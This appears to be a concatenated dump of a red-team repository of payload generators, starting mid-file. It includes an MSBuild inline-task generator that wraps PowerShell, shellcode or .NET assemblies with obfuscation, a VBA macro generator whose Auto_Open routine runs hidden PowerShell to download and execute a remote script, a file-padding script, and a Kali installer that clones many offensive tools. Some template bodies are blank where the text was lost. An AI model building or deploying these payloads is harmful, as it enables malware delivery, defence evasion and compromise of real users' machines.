hta = "\n" 23 | hta += "\n" 24 | hta += "\n" 25 | hta += "\n" 26 | hta += "" + html_title + "\n" 27 | hta += "\n" 36 | hta += "\n" 45 | hta += "\n" 46 | hta += "\n" 47 | hta += "\n" 48 | hta += "\n" 49 | 50 | hf = open(hta_payload, 'w') 51 | hf.write(hta) 52 | hf.close() 53 | 54 | print ("File saved as: " + hta_payload) 55 | -------------------------------------------------------------------------------- /Payloads/Generators/MSBuildXMLPayload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # 3 | # Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or 4 | # .NET/CLR assembly EXE file into inline-task XML file that can be further launched by: 5 | # 6 | # %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 7 | # or 8 | # %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe 9 | # 10 | # This script can embed following data within constructed CSharp Task: 11 | # - Powershell code 12 | # - raw Shellcode in a separate thread via CreateThread 13 | # - .NET Assembly via Assembly.Load 14 | # 15 | # Mariusz B. 
/ mgeeky, 16 | # 17 | 18 | import re 19 | import os 20 | import io 21 | import sys 22 | import gzip 23 | import base64 24 | import string 25 | import struct 26 | import random 27 | import binascii 28 | import argparse 29 | 30 | 31 | def getCompressedPayload(filePath): 32 | out = io.BytesIO() 33 | encoded = '' 34 | with open(filePath, 'rb') as f: 35 | inp = f.read() 36 | 37 | with gzip.GzipFile(fileobj = out, mode = 'w') as fo: 38 | fo.write(inp) 39 | 40 | encoded = base64.b64encode(out.getvalue()) 41 | 42 | powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( 43 | encoded.decode() 44 | ) 45 | return powershell 46 | 47 | def getInlineTask(payload, _format): 48 | 49 | templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15))) 50 | taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15))) 51 | 52 | launchCode = '' 53 | 54 | if _format == 'exe': 55 | 56 | exeLaunchCode = string.Template(''' 57 | 58 | 59 | 60 | 61 | 62 | 71 | ''').safe_substitute( 72 | payload2 = base64.b64encode(payload.encode()).decode() 73 | ) 74 | 75 | 76 | launchCode = exeLaunchCode 77 | 78 | elif _format == 'raw': 79 | 80 | foo = str(binascii.hexlify(payload), 'ascii') 81 | fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] 82 | encodedPayload = ' ' 83 | 84 | for i in range(len(fooarr)): 85 | if i % 32 == 0 and i > 0: 86 | encodedPayload += '\n ' 87 | encodedPayload += '{}, '.format(fooarr[i]) 88 | 89 | encodedPayload = encodedPayload.strip()[:-1] 90 | 91 | shellcodeLoader = string.Template(''' 92 | 93 | 94 | 147 | ''').safe_substitute( 148 | templateName = templateName, 149 | payload2 = encodedPayload, 150 | payloadSize = len(payload) 151 | ) 152 | 153 | launchCode = shellcodeLoader 154 | 155 | else: 156 | powershellLaunchCode = 
string.Template(''' 157 | 158 | 159 | 183 | ''').safe_substitute( 184 | templateName = templateName, 185 | payload2 = base64.b64encode(payload.encode()).decode() 186 | ) 187 | 188 | launchCode = powershellLaunchCode 189 | 190 | 191 | template = string.Template(''' 192 | 193 | 194 | 195 | 196 | 197 | 198 | <$templateName /> 199 | 200 | 202 | $launchCode 203 | 204 | 205 | ''').safe_substitute( 206 | taskName = taskName, 207 | templateName = templateName, 208 | launchCode = launchCode 209 | ) 210 | 211 | return template 212 | 213 | def detectFileIsExe(filePath, forced = False): 214 | first1000 = [] 215 | 216 | with open(filePath, 'rb') as f: 217 | first1000 = f.read()[:1000] 218 | 219 | if not (first1000[0] == 'M' and first1000[1] == 'Z'): 220 | return False 221 | 222 | elfanew = struct.unpack('\s*\n', '', output) 236 | output = output.replace('\n', '') 237 | output = re.sub(r'\s{2,}', ' ', output) 238 | output = re.sub(r'\s+([^\w])\s+', r'\1', output) 239 | output = re.sub(r'([^\w"])\s+', r'\1', output) 240 | 241 | variables = { 242 | 'payload' : 'x', 243 | 'method' : 'm', 244 | 'asm' : 'a', 245 | 'instance' : 'o', 246 | 'pipeline' : 'p', 247 | 'runspace' : 'r', 248 | 'decoded' : 'd', 249 | 'MEM_COMMIT' : 'c1', 250 | 'PAGE_EXECUTE_READWRITE' : 'c2', 251 | 'MEM_RELEASE' : 'c3', 252 | 'funcAddr' : 'v1', 253 | 'hThread' : 'v2', 254 | 'threadId' : 'v3', 255 | 'lpAddress' : 'p1', 256 | 'dwSize' : 'p2', 257 | 'flAllocationType' : 'p3', 258 | 'flProtect' : 'p4', 259 | 'dwFreeType' : 'p5', 260 | 'lpThreadAttributes' : 'p6', 261 | 'dwStackSize' : 'p7', 262 | 'lpStartAddress' : 'p8', 263 | 'param' : 'p9', 264 | 'dwCreationFlags' : 'p10', 265 | 'lpThreadId' : 'p11', 266 | 'dwMilliseconds' : 'p12', 267 | 'hHandle' : 'p13', 268 | } 269 | 270 | for k, v in variables.items(): 271 | output = output.replace(k, v) 272 | 273 | return output 274 | 275 | def opts(argv): 276 | parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] ') 277 | 
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') 278 | parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.') 279 | parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.') 280 | parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!') 281 | parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') 282 | 283 | args = parser.parse_args() 284 | 285 | if args.exe and args.raw: 286 | sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') 287 | sys.exit(-1) 288 | 289 | return args 290 | 291 | def main(argv): 292 | sys.stderr.write(''' 293 | :: Powershell via MSBuild inline-task XML payload generation script 294 | To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' 295 | Mariusz B. / mgeeky, 296 | 297 | ''') 298 | if len(argv) < 2: 299 | print('Usage: ./generateMSBuildXML.py ') 300 | sys.exit(-1) 301 | 302 | args = opts(argv) 303 | 304 | _format = 'powershell' 305 | 306 | if args.exe: 307 | if not detectFileIsExe(args.inputFile, args.exe): 308 | sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') 309 | return False 310 | 311 | _format = 'exe' 312 | sys.stderr.write('[?] File recognized as PE/EXE.\n\n') 313 | with open(args.inputFile, 'rb') as f: 314 | payload = f.read() 315 | 316 | elif args.raw: 317 | _format = 'raw' 318 | sys.stderr.write('[?] File specified as raw Shellcode.\n\n') 319 | with open(args.inputFile, 'rb') as f: 320 | payload = f.read() 321 | 322 | else: 323 | sys.stderr.write('[?] 
File not recognized as PE/EXE.\n\n') 324 | 325 | if args.inputFile.endswith('.exe'): 326 | return False 327 | 328 | payload = getCompressedPayload(args.inputFile) 329 | 330 | output = getInlineTask(payload, _format) 331 | 332 | if args.minimize: 333 | output = minimize(output) 334 | 335 | if args.encode: 336 | print(base64.b64encode(output)) 337 | else: 338 | print(output) 339 | 340 | msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 341 | if 'PROGRAMFILES(X86)' in os.environ: 342 | msbuildPath = r'%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe' 343 | 344 | sys.stderr.write(''' 345 | 346 | ===================================== 347 | 348 | Execute this XML file like so: 349 | 350 | {} file.xml 351 | '''.format(msbuildPath)) 352 | 353 | if __name__ == '__main__': 354 | main(sys.argv) 355 | -------------------------------------------------------------------------------- /Payloads/Generators/Macro-Generator.py: -------------------------------------------------------------------------------- 1 | # /usr/bin/python3 env 2 | # A simpe Macro Generator 3 | # Simple POC, this can be used with other tools to obfuscate 4 | # Will Bypass nothing 5 | 6 | print (""" 7 | __ __ _____ _ 8 | | \/ | / ____| | | 9 | | \ / | __ _ ___ _ __ ___ ______| | __ ___ _ __ ___ _ __ __ _| |_ ___ _ __ 10 | | |\/| |/ _` |/ __| '__/ _ \______| | |_ |/ _ \ '_ \ / _ \ '__/ _` | __/ _ \| '__| 11 | | | | | (_| | (__| | | (_) | | |__| | __/ | | | __/ | | (_| | || (_) | | 12 | |_| |_|\__,_|\___|_| \___/ \_____|\___|_| |_|\___|_| \__,_|\__\___/|_| 13 | 14 | 15 | """) 16 | 17 | macro_name = input ("Choose File name >>") 18 | print ("Example: http://example:80/Payload.ps1") 19 | url = input ("Enter Full URL payload with PS Filename included >>") 20 | 21 | macro_payload = macro_name + '.vbs' 22 | macro = "Sub Auto_Open()\n" 23 | macro += " Dim exec As String\n" 24 | macro += " Dim payload As String\n" 25 | macro += """ exec = "powershell.exe -WindowStyle hidden -nologo 
-noprofile -c ""IEX ((New-Object Net.WebClient).DownloadString""" 26 | macro += "('" 27 | macro += str(url) 28 | macro += "'))\"\"\"\n" 29 | macro += " Shell (exec)\n" 30 | macro += "End Sub\n" 31 | macro += "Sub AutoOpen()\n" 32 | macro += " Auto_Open\n" 33 | macro += "End Sub\n" 34 | macro += "Sub Workbook_Open()\n" 35 | macro += " Auto_Open\n" 36 | macro += "End Sub\n" 37 | 38 | macrof = open(macro_payload, 'w') 39 | macrof.write(macro) 40 | macrof.close() 41 | 42 | print ("File saved as: " + macro_name) 43 | 44 | -------------------------------------------------------------------------------- /Payloads/Generators/Padding.py: -------------------------------------------------------------------------------- 1 | #/usr/bin/env python3 2 | #Python3 padding.py [file] [size] [-mb/-kb] 3 | 4 | import sys 5 | if len (sys.argv) < 4: 6 | sys.exit("[Missing Arguments!!\n [+] Usage: Python3 Padding.py [file] [size] [-mb/kb]") 7 | 8 | bp = sys.argv[1] 9 | size = int(sys.argv[2]) 10 | tp = sys.argv[3] 11 | 12 | f = open(bp, 'ab') 13 | if tp == '-kb': 14 | b_size = size * 1024 15 | elif tp == '-mb': 16 | b_size = size * 1048576 17 | else: 18 | sys.exit('[+] Use -mb or -kb!') 19 | 20 | buffersize = 256 21 | 22 | for i in range(b_size // buffersize): 23 | f.write(b"0" * buffersize) 24 | 25 | f.close() 26 | 27 | print ("[+] Finished Padding ", bp, "with ", size, tp) 28 | -------------------------------------------------------------------------------- /Payloads/Generators/README.md: -------------------------------------------------------------------------------- 1 | Simple Payload Generatos to cut time on these will not Bypass nothing they are simple POC to be guided with, you can 2 | probably Obfuscate these who knows ¯\_(ツ)_/¯ 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Had to change the README as it makes more sense that the github was more 
related to the GITBOOK Page realted to Red Team Notes 2 | Will most likely start working on a repository for other stuff. 3 | -------------------------------------------------------------------------------- /Tool Installer/Tools-Kali-Installation.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/python3 env 2 | # Favorite tools 3 | # Scripted cause I have to download again everytime I start fresh 4 | # It's annoying 5 | # This tool doesnt automatically install them....Yet 6 | # Won't work on that becasue I don't want it to force install any packages 7 | # Version 0.5 8 | # Added more tools and fixed some typos 9 | # Added the Names cause I would get lost 10 | # Added more installations steps so tools get a chance to be ready and installed 11 | # Kali linux Version 12 | ###################################### 13 | # 14 | # Current Tools 15 | # 16 | # Sn1per, CrossLinked,EvilCLippy, donut, DomainPasswordSpray, RedELK, Rubeus, BloodHOund, Kerberoast 17 | # MailSniper, Phantom Evasion, venom, Penetration Testing Tools (Red Team Folder), Empire, Macro_Pack 18 | # Covenant, Unicorn, SpookFLare,NetLoader, OSRFRAMEWORK, Wesng, GhostPack 19 | # spoofcheck, skiptracer, ScrapedIn, SimplyEmail (docker), typofinder, pwndb, spiderfoot, demiguise 20 | # Office-DDE-Payloads, EvilURL, SCT-Obfuscator, UACBypass Collection, CredSniper, Infoga, koadic, Scriblur 21 | # powerob, LethalHTA, vba-obfuscator, vba_obfuscator, impacket, SprayingToolKit, docker.io 22 | # 23 | ###################################### 24 | 25 | import subprocess 26 | import time 27 | import os 28 | 29 | print ("Tool installer for Red Team") 30 | print ("Or hacking in general") 31 | print ("THIS WILL NOT INSTALL THE TOOLS IT WILL JUST DOWNLOAD THE REPOS") 32 | print ("Please run as root files get saved on your '/opt' PATH") 33 | print ('') 34 | print ("Ready ?") 35 | 36 | # Extra packages so some of the tools work 37 | 38 | package1 
='https://packages.microsoft.com/config/ubuntu/19.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb' 39 | 40 | ready = input('> ') 41 | 42 | if ready == 'y': 43 | os.chdir('/opt') 44 | # First we will update and download a few necessary packages 45 | os.system('apt update') 46 | os.system('apt upgrade') 47 | os.system('apt dist-upgrade') 48 | os.system(' apt install python3-pip') 49 | os.system('wget -q ' + package1) 50 | os.system('dpkg -i packages-microsoft-prod.deb') 51 | # I can add more dependecies and install them so they are already avaialble 52 | # For example DOTNET for Covenant 53 | # More tools 0.2 54 | os.system('apt install exiftool') 55 | os.system('apt install gobuster') 56 | #os.system('apt install julia') # New programming language 57 | os.system('apt install docker') 58 | os.system('apt install docker.io') 59 | os.system('apt-get install dotnet-sdk-3.1') # This version is necessary for Covenant 60 | os.system('apt-get install apt-transport-https') 61 | os.system('pip3 install mitm6') 62 | # Tools 0.5 (Removed HiddenEye, Added Infoga, Rubeus,Phantom Evasion, MailSniper) 63 | # Added Various tools and fixed a few commands 64 | subprocess.call(['git', 'clone', 'https://github.com/1N3/Sn1per.git']) 65 | subprocess.call(['git', 'clone', 'https://github.com/m8r0wn/CrossLinked.git']) 66 | subprocess.call(['git', 'clone', 'https://github.com/outflanknl/EvilClippy.git']) 67 | subprocess.call(['git', 'clone', 'https://github.com/TheWover/donut.git']) 68 | subprocess.call(['git', 'clone', 'https://github.com/dafthack/DomainPasswordSpray.git']) 69 | subprocess.call(['git', 'clone', 'https://github.com/outflanknl/RedELK.git']) 70 | subprocess.call(['git', 'clone', 'https://github.com/GhostPack/Rubeus.git']) 71 | subprocess.call(['wget', 'https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.4/BloodHound-linux-x64.zip']) 72 | subprocess.call(['git', 'clone', 'https://github.com/nidem/kerberoast.git']) 73 | subprocess.call(['git', 'clone', 
'https://github.com/dafthack/MailSniper.git']) 74 | subprocess.call(['git', 'clone', 'https://github.com/oddcod3/Phantom-Evasion.git']) 75 | subprocess.call(['git', 'clone', 'https://github.com/r00t-3xp10it/venom.git']) 76 | subprocess.call(['svn', 'checkout', 'https://github.com/mgeeky/Penetration-Testing-Tools/trunk/red-teaming']) 77 | subprocess.call(['git', 'clone', 'https://github.com/BC-SECURITY/Empire.git']) 78 | subprocess.call(['git', 'clone', 'https://github.com/sevagas/macro_pack.git']) 79 | subprocess.call(['git', 'clone', '--recursive', 'https://github.com/cobbr/Covenant.git']) 80 | subprocess.call(['git', 'clone', 'https://github.com/trustedsec/unicorn.git']) 81 | subprocess.call(['git', 'clone', 'https://github.com/hlldz/SpookFlare.git']) 82 | subprocess.call(['git', 'clone', 'https://github.com/Flangvik/NetLoader.git']) 83 | subprocess.call(['apt', 'install', 'osrframework']) 84 | subprocess.call(['git', 'clone', 'https://github.com/bitsadmin/wesng.git']) 85 | subprocess.call(['git', 'clone', 'https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git']) 86 | subprocess.call(['git', 'clone', 'https://github.com/BishopFox/spoofcheck.git']) 87 | subprocess.call(['git', 'clone', 'https://github.com/xillwillx/skiptracer.git']) 88 | subprocess.call(['git', 'clone', 'https://github.com/dchrastil/ScrapedIn.git']) 89 | subprocess.call(['git', 'clone', 'https://github.com/SimplySecurity/SimplyEmail.git']) 90 | subprocess.call(['git', 'clone', 'https://github.com/nccgroup/typofinder.git']) 91 | subprocess.call(['git', 'clone', 'https://github.com/davidtavarez/pwndb.git']) 92 | subprocess.call(['git', 'clone', 'https://github.com/smicallef/spiderfoot.git']) 93 | subprocess.call(['git', 'clone', 'https://github.com/nccgroup/demiguise.git']) 94 | subprocess.call(['git', 'clone', 'https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads.git']) 95 | subprocess.call(['git', 'clone', 'https://github.com/UndeadSec/EvilURL.git']) 96 | subprocess.call(['git', 
'clone', 'https://github.com/Mr-Un1k0d3r/SCT-obfuscator.git']) 97 | subprocess.call(['git', 'clone', 'https://github.com/api0cradle/UltimateAppLockerByPassList.git']) 98 | subprocess.call(['git', 'clone', 'https://github.com/ustayready/CredSniper.git']) 99 | subprocess.call(['git', 'clone', 'https://github.com/m4ll0k/Infoga.git']) 100 | subprocess.call(['git', 'clone', 'https://github.com/zerosum0x0/koadic.git']) 101 | subprocess.call(['git', 'clone', 'https://github.com/nins3i/Scriblur.git']) 102 | subprocess.call(['git', 'clone', 'https://github.com/cwolff411/powerob.git']) 103 | subprocess.call(['git', 'clone', 'https://github.com/codewhitesec/LethalHTA.git']) 104 | subprocess.call(['git', 'clone', 'https://github.com/m8r0wn/CrossLinked.git']) 105 | subprocess.call(['git', 'clone', 'https://github.com/bonnetn/vba-obfuscator.git']) 106 | subprocess.call(['git', 'clone', 'https://github.com/ch4meleon/vba_obfuscator.git']) 107 | subprocess.call(['git', 'clone', 'https://github.com/SecureAuthCorp/impacket.git']) 108 | subprocess.call(['git', 'clone', 'https://github.com/byt3bl33d3r/SprayingToolkit.git']) 109 | subprocess.call(['git', 'clone', '--recurse-submodules', 'https://github.com/cobbr/Covenant']) 110 | # This will install Spider requirements 111 | # subprocess.call(['pip', 'install', '-r', '/opt/spiderfoot/requirements.txt')] 112 | # Continue with tools 113 | # Installing packages 114 | elif ready == 'n': 115 | print ("OK") 116 | 117 | --------------------------------------------------------------------------------